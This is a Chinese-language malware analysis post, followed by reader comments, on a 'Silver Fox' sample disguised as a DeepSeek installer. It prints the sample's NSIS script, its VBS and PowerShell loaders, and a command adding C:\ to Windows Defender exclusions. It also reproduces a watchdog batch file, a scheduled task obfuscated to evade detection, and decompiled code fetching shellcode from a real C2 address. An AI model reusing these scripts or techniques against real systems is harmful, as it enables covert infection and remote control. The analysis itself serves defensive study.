【病毒分析】潜伏在AI工具中的幽灵:银狐家族社工攻击的深度剖析
# 1.背景近期,AI大模型领域热度飙升,DeepSeek等开源大模型成为开发者与普通用户的热门选择。攻击者敏锐捕捉到这一趋势,将恶意软件伪装成"DeepSeek大模型自动安装助手",利用用户对技术工具的迫切需求实施精准社工攻击。"银狐"家族作为长期活跃的APT组织,擅长通过热点事件伪造合法软件,此次攻击是其新型社会工程学策略的典型体现,该样本来源[银狐突袭!DeepSeek本地化部署暗藏“致命陷阱”](https://mp.weixin.qq.com/s/VUzwaR7eti2YoNebGFz80A)。
# 2.恶意文件分析
拖入die中,发现是由nsis打包而成的
使用7zip-nsis解包
其中.nsi文件为安装配置,关键部分如下。在`$APPDATA\Axialis`目录释放文件之后,执行Decision.vbs,然后再将真正的ds大模型安装助手的快捷方式放置于桌面
```C
Section MainSection ; Section_0
; AddSize 136708
Sleep 500
SetOutPath $APPDATA\Axialis
Sleep 500
File Config.ini
Sleep 500
File Config2.ini
Sleep 500
File silently.ps1
Sleep 500
File Update.dll
Sleep 500
File Decision.vbs
Sleep 500
Exec "wscript //B $\"$APPDATA\Axialis\Decision.vbs$\""
SetOutPath $INSTDIR
Sleep 500
Sleep 500
SetOverwrite ifnewer
File ds大模型安装助手_1.0.0.6_1740119628.exe
Sleep 500
CreateShortCut $DESKTOP\ds大模型安装助手_1.0.0.6_1740119628.lnk $INSTDIR\ds大模型安装助手_1.0.0.6_1740119628.exe
SectionEnd
```
## 2.1程序执行流程
## 2.2程序分析
### 2.2.1关联启动恶意进程
解包后`$APPDATA\Axialis`目录下为后门程序
首先是Decision.vbs,用于启动同路径下的silently.ps1文件
```VBScript
Set objShell = CreateObject("WScript.Shell")
RoamingPath = objShell.ExpandEnvironmentStrings("%APPDATA%")
FilePath = RoamingPath & "\Axialis\silently.ps1"
objShell.Run "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File """ & FilePath & """", 0, False
```
silently.ps1文件内容如下,用于启动同路径下的Update.dll的导出函数TCGamerUpdateMain
```C
$RoamingDir = ::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Axialis\Update.dll"
$DllPathEscaped = $DllPath -replace '\\', '\\\\'
$code = @"
using System;
using System.Runtime.InteropServices;
public class DllInvoker
{
public static extern void TCGamerUpdateMain();
}
"@
Add-Type -TypeDefinition $code
::TCGamerUpdateMain()
```
首先创建互斥体保证只有一个实例运行,然后获取`C:\Users\username\AppData\Roaming\Axialis` 这个路径下的`Config2.ini`文件。
然后在内存中加载shellcode
shellcode创建线程执行操作
```C
int sub_10014540()
{
int v0; // eax
int v1; // eax
v0 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v0);
((void (__stdcall *)(_DWORD, _DWORD, int (__usercall *)@<eax>(int@<ebp>), _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
sub_10013F20,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_1000A9F0,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_100137E0,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_10014390,
0,
0,
0);
((void (__stdcall *)(_DWORD, _DWORD, void *, _DWORD, _DWORD, _DWORD))kernel32_CreateThread)(
0,
0,
&sub_100142F0,
0,
0,
0);
v1 = ((int (__stdcall *)(int))kernel32_GetCurrentThread)(5000);
((void (__stdcall *)(int))kernel32_WaitForSingleObject)(v1);
((void (*)(void))byte_10013450)();
((void (__stdcall *)(_DWORD))unk_1001DC47)(0);
return 0;
}
```
### 2.2.2线程1:将c盘添加到杀软白名单
通过执行指令`powershell -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"`将c盘添加到windows defender白名单中
```C
int __usercall sub_10013F20@<eax>(int a1@<ebp>)
{
v37 = a1;
v38 = retaddr;
v36 = -1;
v35 = &unk_10032941;
ExceptionList = NtCurrentTeb()->NtTib.ExceptionList;
*(_DWORD *)&v33 = &v39;
v28 = sub_10007310((char *)&v29 + 1);
qmemcpy(v30, "powershell -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"", sizeof(v30));
---------------------------------省略部分内容----------------------------------------
qmemcpy(v32, "/C ", sizeof(v32));
---------------------------------省略部分内容----------------------------------------
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v13, 0, 56);
v13 = 64;
v13 = 0;
v13 = "open";
v13 = "cmd.exe";
v13 = string(v11);
v13 = 0;
v13 = 0;
if ( ((int (__stdcall *)(int *))shell32_ShellExecuteEx)(&v12) && v14 )
{
((void (__stdcall *)(int, int))kernel32_WaitForSingleObject)(v14, -1);
((void (__stdcall *)(int))kernel32_CloseHandle)(v14);
}
return maybe_alloc(v11);
}
```
### 2.2.3线程2:创建守护进程
执行流程如下
写入monitor.bat并执行
```C
int __cdecl sub_10002D00(void *a1)
{
((void (__stdcall *)(int, _BYTE *))kernel32_GetTempPathA)(260, v6);
str_addr = get_str_addr(v11, (int)v6);
v22 = str_addr;
v24 = 0;
str_concat((int)v13, str_addr, (int)"target.pid");
LOBYTE(v24) = 2;
maybe_alloc(v11);
v21 = get_str_addr(v10, (int)v6);
v20 = v21;
LOBYTE(v24) = 3;
str_concat((int)v14, v21, (int)"monitor.bat");
LOBYTE(v24) = 5;
maybe_alloc(v10);
create_file(v12, v14, 2, 64, 1);
LOBYTE(v24) = 6;
if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v12) )
{
((void (__cdecl *)(char *, const char *))write)(v12, "@echo off\n");
((void (*)(char *, const char *, ...))write)(v12, "set \"PIDFile=%TEMP%\\target.pid\"\n");
v1 = ((int (__cdecl *)(char *, const char *))write)(v12, "set \"VBSPath=");
v2 = write_2(v1, a1);
((void (__cdecl *)(int, void *))write)(v2, &unk_1003ACB8);
((void (*)(char *, const char *, ...))write)(v12, "set /p pid=<\"%PIDFile%\"\n");
((void (*)(char *, const char *, ...))write)(v12, "del \"%PIDFile%\"\n");
((void (__cdecl *)(char *, const char *))write)(v12, ":check\n");
((void (*)(char *, const char *, ...))write)(v12, "tasklist /fi \"PID eq %pid%\" | findstr /i \"%pid%\" > nul\n");
((void (__cdecl *)(char *, const char *))write)(v12, "if errorlevel 1 (\n");
((void (*)(char *, const char *, ...))write)(v12, " cscript //nologo \"%VBSPath%\"\n");
((void (__cdecl *)(char *, const char *))write)(v12, " exit\n");
((void (__cdecl *)(char *, void *))write)(v12, &unk_1003AD80);
((void (__cdecl *)(char *, const char *))write)(v12, "timeout /t 15\n");
((void (__cdecl *)(char *, const char *))write)(v12, "goto check\n");
((void (__thiscall *)(char *))file_close)(v12);
}
v3 = (const char *)string(v14);
((void (*)(_BYTE *, const char *, ...))exec)(v5, "cmd.exe /B /c \"%s\"", v3);
v19 = ((int (*)(void))kernel32_GetCurrentProcessId)();
create_file(v7, v13, 2, 64, 1);
LOBYTE(v24) = 7;
if ( (unsigned __int8)((int (__thiscall *)(char *))judge_exist)(v7) )
{
((void (__thiscall *)(char *, int))unk_100041E0)(v7, v19);
((void (__thiscall *)(char *))file_close)(v7);
}
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(v8, 0, 68);
v8 = 68;
v8 = 1;
v9 = 5;
v15 = 0;
v16 = 0;
v17 = 0;
v18 = 0;
if ( ((int (__stdcall *)(_DWORD, _BYTE *, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD *, int *))kernel32_CreateProcessA)(
0,
v5,
0,
0,
0,
0,
0,
0,
v8,
&v15) )
{
((void (__stdcall *)(int))kernel32_CloseHandle)(v15);
((void (__stdcall *)(int))kernel32_CloseHandle)(v16);
}
LOBYTE(v24) = 6;
((void (__thiscall *)(char *))unk_10003090)(v7);
LOBYTE(v24) = 5;
((void (__thiscall *)(char *))unk_10003090)(v12);
LOBYTE(v24) = 2;
maybe_alloc(v14);
v24 = -1;
return maybe_alloc(v13);
}
```
monitor.bat内容如下,作用为充当守护进程,在特定进程被关闭时就重新启动该进程
```C
@echo off
set "PIDFile=%TEMP%\target.pid"
set "VBSPath=C:\Users\123\AppData\Roaming\Axialis\Decision.vbs"
set /p pid=<"%PIDFile%"
del "%PIDFile%"
:check
tasklist /fi "PID eq %pid%" | findstr /i "%pid%" > nul
if errorlevel 1 (
cscript //nologo "%VBSPath%"
exit
)
timeout /t 15
goto check
```
### 2.2.4线程3:持久化
创建xml和ps1文件并调用ps1文件添加计划任务
```C
// bad sp value at call has been detected, the output may be wrong!
int __usercall sub_1000A9F0@<eax>(int a1@<ecx>, int a2@<ebp>, _DWORD *a3@<edi>, int a4@<esi>)
{
((void (__stdcall *)(int, int *, int, struct _EXCEPTION_REGISTRATION_RECORD *, void *, int))unk_10016430)(
a1,
&v50,
a1,
NtCurrentTeb()->NtTib.ExceptionList,
&unk_1003270B,
-1);
v48 = (int)&v50;
v47 = a4;
v46 = a3;
get_str_addr(&v49[-1002], (int)".NET Framework NGEN v4.0.30325");
v48 = 0;
v49[-885] = get_Roaming_FolderPath(&v49[-1100], 26);
v49[-886] = v49[-885];
LOBYTE(v48) = 1;
str_concat((int)&v49[-996], (void *)v49[-886], (int)"\\Axialis\\Decision.vbs");
LOBYTE(v48) = 3;
maybe_alloc(&v49[-1100]);
v4 = string(&v49[-996]);
((void (__cdecl *)(_DWORD *, _DWORD *))unk_1000A7F0)(&v49[-990], v4);
LOBYTE(v48) = 4;
v49[-805] = sub_10007310((char *)&v49[-113] + 3);
qmemcpy(
&v49[-112],
"base64编码后的数据",
220);
v5 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, _DWORD *))unk_10001730)(&v49[-1016], &v49[-112], &v49[-57]);
v6 = v5;
v49[-864] = *v5;
v49[-863] = v6;
((void (__thiscall *)(_DWORD *, _DWORD, _DWORD, _DWORD))unk_10011190)(&v49[-892], v49[-864], v49[-863], v49[-805]);
LOBYTE(v48) = 5;
v49[-806] = sub_10007310((char *)&v49[-113] + 2);
qmemcpy(
&v49[-804],
“base64编码的数据”,
2744);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-24], "\\PolicyManagement.xml", 21);
v13 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1018],
&v49[-24],
(char *)&v49[-19] + 1);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-56], "powershell -Command \"Set-ExecutionPolicy Unrestricted -Scope CurrentUser\"", 73);
v25 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1078],
&v49[-56],
(char *)&v49[-38] + 1);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-18], "cmd.exe /C ", 11);
v27 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1010],
&v49[-18],
(char *)&v49[-16] + 3);
---------------------------------省略部分内容----------------------------------------
qmemcpy(&v49[-35], "powershell -ExecutionPolicy Bypass -File ", 41);
v30 = (_DWORD *)((int (__thiscall *)(_DWORD *, _DWORD *, char *))unk_10001730)(
&v49[-1012],
&v49[-35],
(char *)&v49[-25] + 1);
v31 = v30;
v49[-880] = *v30;
v49[-879] = v31;
((void (__thiscall *)(_DWORD *, _DWORD, _DWORD, _DWORD))unk_10011190)(&v49[-928], v49[-880], v49[-879], v49[-853]);
LOBYTE(v48) = 67;
((void (__cdecl *)(_DWORD *, _DWORD *))unk_1000A6B0)(&v49[-966], &v49[-928]);
LOBYTE(v48) = 69;
((void (__thiscall *)(_DWORD *))unk_10011170)(&v49[-928]);
v49[-859] = string(&v49[-898]);
v49[-854] = sub_10007310((char *)&v49[-115] + 2);
qmemcpy(v43, "/C ", sizeof(v43));
---------------------------------省略部分内容----------------------------------------
((void (__cdecl *)(_DWORD *, _DWORD, int))unk_10017060)(&v49[-947], 0, 56);
v49[-947] = 64;
v49[-946] = 0;
v49[-945] = "open";
v49[-944] = "cmd.exe";
v49[-943] = string(&v49[-966]);
v49[-942] = 0;
v49[-941] = 0;
if ( ((int (__stdcall *)(_DWORD *))shell32_ShellExecuteEx)(&v49[-948]) && v49[-934] )
{
((void (__stdcall *)(_DWORD, int))kernel32_WaitForSingleObject)(v49[-934], -1);
((void (__stdcall *)(_DWORD))kernel32_CloseHandle)(v49[-934]);
}
return v49[-862];
}
```
xml文件内容如下,用于执行Decision.vbs,其中利用了引号来规避杀软的字符串匹配`""D""e""c""i""s""i""o""n.vbs`
```C
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2006-11-10T14:29:55.5851926</Date>
<Author>Microsoft Corporation</Author>
<Description>更新用户的 AD RMS 权限策略模板。如果对服务器上模板分发 Web 服务的身份验证失败,此作业将提供凭据提示。</Description>
<URI>\.NET Framework NGEN v4.0.30325</URI>
<SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
<LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">
<Enabled>true</Enabled>
<Delay>PT30S</Delay>
</LogonTrigger>
</Triggers>
<Principals>
<Principal id="AllUsers">
<GroupId>S-1-1-0</GroupId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority>
<RestartOnFailure>
<Interval>PT1M</Interval>
<Count>16</Count>
</RestartOnFailure>
</Settings>
<Actions Context="AllUsers">
<Exec>
<Command>w""s""c""r""i""p""t.exe</Command>
<Arguments>C:\Users\123\AppData\Roaming\Axialis\""D""e""c""i""s""i""o""n.vbs</Arguments>
</Exec>
</Actions>
</Task>
```
然后释放文件updated.ps1内容如下,用于添加计划任务
```C
$xmlPath = "C:\Users\123\AppData\Local\PolicyManagement.xml"
$taskName = ".NET Framework NGEN v4.0.30325"
$xmlContent = Get-Content -Path $xmlPath | Out-String
Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
```
然后调用`shell32_ShellExecuteEx`执行
```C
/C powershell -ExecutionPolicy Bypass -File C:\\Users\\123\\AppData\\Local\\updated.ps1
```
### 2.2.5线程4:检测Telegram.exe
遍历寻找进程`Telegram.exe`
```C
char __cdecl sub_10013690(int a1)
{
_DWORD v2; // BYREF
_BYTE v3; // BYREF
int v4; //
char v5; //
v5 = 0;
v4 = ((int (__stdcall *)(int, _DWORD))kernel32_CreateToolhelp32Snapshot)(2, 0);
if ( v4 == -1 )
return 0;
v2 = 296;
if ( ((int (__stdcall *)(int, _DWORD *))kernel32_Process32First)(v4, v2) )
{
while ( !(unsigned __int8)((int (__cdecl *)(int, _BYTE *))unk_100145F0)(a1, v3) )
{
if ( !((int (__stdcall *)(int, _DWORD *))kernel32_Process32Next)(v4, v2) )
goto LABEL_7;
}
v5 = 1;
}
LABEL_7:
((void (__stdcall *)(int))kernel32_CloseHandle)(v4);
return v5;
}
```
如果寻找到这个进程就调用shell32_ShellExecuteEx打开rundll32.exe执行`C:\\Users\\123\\AppData\\Roaming\\\\Axialis\\\\Update.dll,TCGamerUpdateMain`。即调用这个导出函数执行config2.ini的内容
### 2.2.6config2.ini
内存加载config2.ini,然后将其dump下来,发现他pdb没有删除
发现这是未混淆过的版本,功能与上文一致
### 2.2.7执行远控
然后执行远控模块
```C
int sub_10013450()
{
_BYTE v1; // BYREF
_DWORD v2; // BYREF
void (*v3)(void); //
_DWORD *v4; // BYREF
int v5; //
int v6; //
int v7; //
int v8; //
int v9; //
int v10; //
_DWORD *i; //
v4 = 0;
i = 0;
v10 = -1;
((void (__stdcall *)(int, _BYTE *))ws2_32_WSAStartup)(514, v1);
v2 = 0;
memset(&v2, 0, 16);
v2 = 2;
v2 = 1;
v2 = 6;
while ( 1 )
{
v5 = ((int (__stdcall *)(char *, const char *, _DWORD *, _DWORD **))ws2_32_getaddrinfo)(
a2712440155,
"18852",
v2,
&v4);
if ( !v5 )
{
for ( i = v4; i; i = (_DWORD *)i )
{
v10 = ((int (__stdcall *)(_DWORD, _DWORD, _DWORD))ws2_32_socket)(i, i, i);
if ( v10 != -1 )
{
v5 = ((int (__stdcall *)(int, _DWORD, _DWORD))ws2_32_connect)(v10, i, i);
if ( v5 != -1 )
break;
((void (__stdcall *)(int))ws2_32_closesocket)(v10);
v10 = -1;
}
}
((void (__stdcall *)(_DWORD *))ws2_32_FreeAddrInfoW)(v4);
if ( v10 != -1 )
break;
}
((void (__stdcall *)(int))kernel32_Sleep)(3000);
}
v6 = 0;
v8 = 4096;
v7 = ((int (__cdecl *)(int))unk_1001DEDA)(4096);
v9 = 0;
while ( 1 )
{
v6 = ((int (__stdcall *)(int, int, int, _DWORD))ws2_32_recv)(v10, v9 + v7, v8 - v9, 0);
if ( v6 <= 0 )
break;
v9 += v6;
if ( v9 == v8 )
{
v8 *= 2;
v7 = ((int (__cdecl *)(int, int))unk_1001DECF)(v7, v8);
}
if ( v6 <= 0 )
goto LABEL_19;
}
if ( v6 )
{
((void (__stdcall *)(int))ws2_32_closesocket)(v10);
((void (*)(void))ws2_32_WSACleanup)();
((void (__cdecl *)(int))unk_1001CD69)(v7);
return 1;
}
LABEL_19:
v3 = (void (*)(void))kernel32_VirtualAlloc(0, v9, 12288, 64);
((void (__cdecl *)(void (*)(void), int, int))unk_10016AD0)(v3, v7, v9);
v3();
((void (__cdecl *)(int))unk_1001CD69)(v7);
((void (__stdcall *)(int))ws2_32_closesocket)(v10);
((void (*)(void))ws2_32_WSACleanup)();
return 0;
}
```
远程加载shllcode,从`27.124.40.155:18852`,其中接收了1c9db字节
```C
int sub_10013450()
{
_BYTE v1; // BYREF
_DWORD v2; // BYREF
void (*v3)(void); //
_DWORD *v4; // BYREF
int v5; //
int v6; //
int v7; //
int v8; //
int v9; //
int v10; //
_DWORD *i; //
v4 = 0;
i = 0;
v10 = -1;
((void (__stdcall *)(int, _BYTE *))ws2_32_WSAStartup)(514, v1);
v2 = 0;
memset(&v2, 0, 16);
v2 = 2;
v2 = 1;
v2 = 6;
while ( 1 )
{
v5 = ((int (__stdcall *)(char *, const char *, _DWORD *, _DWORD **))ws2_32_getaddrinfo)(
a2712440155,
"18852",
v2,
&v4);
if ( !v5 )
{
for ( i = v4; i; i = (_DWORD *)i )
{
v10 = ((int (__stdcall *)(_DWORD, _DWORD, _DWORD))ws2_32_socket)(i, i, i);
if ( v10 != -1 )
{
v5 = ((int (__stdcall *)(int, _DWORD, _DWORD))ws2_32_connect)(v10, i, i);
if ( v5 != -1 )
break;
((void (__stdcall *)(int))ws2_32_closesocket)(v10);
v10 = -1;
}
}
((void (__stdcall *)(_DWORD *))ws2_32_FreeAddrInfoW)(v4);
if ( v10 != -1 )
break;
}
((void (__stdcall *)(int))kernel32_Sleep)(3000);
}
v6 = 0;
v8 = 4096;
v7 = ((int (__cdecl *)(int))unk_1001DEDA)(4096);
v9 = 0;
while ( 1 )
{
v6 = ((int (__stdcall *)(int, int, int, _DWORD))ws2_32_recv)(v10, v9 + v7, v8 - v9, 0);
if ( v6 <= 0 )
break;
v9 += v6;
if ( v9 == v8 )
{
v8 *= 2;
v7 = ((int (__cdecl *)(int, int))unk_1001DECF)(v7, v8);
}
if ( v6 <= 0 )
goto LABEL_19;
}
if ( v6 )
{
((void (__stdcall *)(int))ws2_32_closesocket)(v10);
((void (*)(void))ws2_32_WSACleanup)();
((void (__cdecl *)(int))unk_1001CD69)(v7);
return 1;
}
LABEL_19:
v3 = (void (*)(void))kernel32_VirtualAlloc(0, v9, 12288, 64);
((void (__cdecl *)(void (*)(void), int, int))unk_10016AD0)(v3, v7, v9);
v3();
((void (__cdecl *)(int))unk_1001CD69)(v7);
((void (__stdcall *)(int))ws2_32_closesocket)(v10);
((void (*)(void))ws2_32_WSACleanup)();
return 0;
}
```
dump下来后发现是一个dll,其中包含c2的配置信息
配置信息如下
连接c2服务器,接收指令并执行
```C
char __thiscall sub_75272D80(void *ArgList, LPCWSTR lpString, u_short hostshort)
{
ResetEvent(*((HANDLE *)ArgList + 1));
InterlockedExchange((volatile LONG *)ArgList + 6, 0);
*((_DWORD *)ArgList + 5) = timeGetTime();
*((_DWORD *)ArgList + 8) = 0;
*((_DWORD *)ArgList + 9) = 0;
*((_WORD *)ArgList + 20) = 0;
v4 = *((_DWORD *)ArgList + 6);
*((_DWORD *)ArgList + 8) = *((_DWORD *)ArgList + 5);
*((_DWORD *)ArgList + 9) = v4;
*((_WORD *)ArgList + 20) = 202;
v5 = socket(2, 1, 6);
*((_DWORD *)ArgList + 25) = v5;
if ( v5 == -1 )
return 0;
v7 = lstrlenW(lpString);
cbMultiByte = WideCharToMultiByte(0, 0, lpString, v7, 0, 0, 0, 0);
v8 = (CHAR *)operator new[](cbMultiByte + 1);
v9 = lstrlenW(lpString);
WideCharToMultiByte(0, 0, lpString, v9, v8, cbMultiByte, 0, 0);
v8 = 0;
v10 = gethostbyname(v8);
operator delete(v8);
if ( !v10 )
return 0;
name.sa_family = 2;
*(_WORD *)name.sa_data = htons(hostshort);
v16 = *((_DWORD *)ArgList + 25);
*(_DWORD *)&name.sa_data = **(_DWORD **)v10->h_addr_list;
if ( connect(v16, &name, 16) == -1 )
return 0;
v12 = *((_DWORD *)ArgList + 25);
*(_DWORD *)optval = 0x40000;
setsockopt(v12, 0xFFFF, 4097, optval, 4);
v13 = *((_DWORD *)ArgList + 25);
*(_DWORD *)optval = 0x40000;
setsockopt(v13, 0xFFFF, 4098, optval, 4);
v14 = *((_DWORD *)ArgList + 25);
*(_DWORD *)v20 = 30000;
setsockopt(v14, 0xFFFF, 4102, v20, 4);
v15 = *((_DWORD *)ArgList + 25);
*(_DWORD *)v19 = 1;
if ( !setsockopt(v15, 0xFFFF, 8, v19, 4) )
{
v11 = *((_DWORD *)ArgList + 25);
vInBuffer = 1;
vInBuffer = 180000;
vInBuffer = 5000;
WSAIoctl(v11, 0x98000004, vInBuffer, 0xCu, 0, 0, &cbBytesReturned, 0, 0);
}
InterlockedExchange((volatile LONG *)ArgList + 6, 1);
ThrdAddr = 0;
*((_DWORD *)ArgList + 23) = _beginthreadex(0, 0, sub_75272FB0, ArgList, 0, &ThrdAddr);
*((_DWORD *)ArgList + 24) = _beginthreadex(0, 0, sub_752730C0, ArgList, 0, &v18);
return 1;
}
```
# 3.总结
本次分析的恶意样本系APT组织"银狐"利用**DeepSeek大模型热度**精心策划的社工攻击典型案例。攻击者通过伪造"大模型自动安装助手"软件,借助**NSIS打包、PowerShell脚本注入、内存加载**等技术,构建了一条隐蔽的攻击链路。其核心策略包括:
1.**热点捆绑**:以AI技术工具为伪装,精准诱骗技术用户下载;
2.**持久控制**:结合计划任务欺骗和进程共生机制,确保恶意程序长期存活。
该案例体现了APT攻击者对技术趋势的敏锐捕捉能力,以及对社会工程学与底层系统漏洞的深度融合。 Vimachu 发表于 2025-3-14 08:40
想问下,用ollama下载的第三方魔改的deepseek是不是也有带毒嫌疑?
单单模型打包好的,例如gguf格式什么的基本不会,就像wallpaper下个视频并不太可能有毒,*塞视频里也要能执行才可以*,这种就是类似p2p下崽器,给你装ollama顺便塞个病毒。专骗不会玩电脑的。 Vimachu 发表于 2025-3-14 08:40
想问下,用ollama下载的第三方魔改的deepseek是不是也有带毒嫌疑?
未知第三方魔改的程序基本都有带毒风险,但是也不绝对,建议从官方或者可信渠道下载 不下载来历不明的软件,及时更新杀毒软件 只用官方的工具 还是老老实实用在线AI 不明觉厉!!!用腾讯元宝妥妥地:lol 好复杂,还敢不敢用AI了? 分析的挺详细的,向大佬学习~ zlzx01 发表于 2025-3-11 11:06
好复杂,还敢不敢用AI了?
只要甄别,还是可以使用AI 使用知名的AI工具那些,用的人多,有公开git仓库的就好多了 还是注意安全吧,